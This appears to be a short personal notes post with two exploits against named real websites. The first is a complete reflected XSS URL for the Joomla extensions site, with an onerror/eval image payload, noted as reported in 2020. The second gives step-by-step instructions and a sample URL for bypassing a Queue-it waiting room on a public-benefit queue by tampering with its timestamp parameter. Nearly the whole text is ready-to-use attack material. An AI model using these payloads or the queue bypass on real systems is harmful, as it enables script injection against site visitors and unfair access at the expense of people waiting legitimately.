pro(re)gress

XSS https://extensions.joomla.org/instant-search/?jed_live[query]=recaptcha&jed_live[refinementList][versions][0]=fantastic <img src=x:alert(alt) onerror=eval(src) alt="Merry xssmas!"> Archived page: https://archive.is/wip/kCTik  Note: Bug reported to joomla.org on 30/11/2020

   Open tamper data (firefox) or any other application (like a proxy to tamper data) and check the post requests. When you get something like that  https://sogei.queue-it.net/?c=sogei&e=mobutente2020&q=52fddcda-579f-46b2-bb44-6c4ddf68e730&cv=[unixtimestamp]&cid=it-IT Set the unixtimestamp to a future date ex. if you the current value is 1604445083694 replace with 1774445083694 (2026+). I used just 1774495521 and it works. ex. https://sogei.queue-it.net/?c=sogei&e=mobutente2020&q=52fddcda-579f-46b2-bb44-6c4ddf68e730&cv=1774495521&cid=it-IT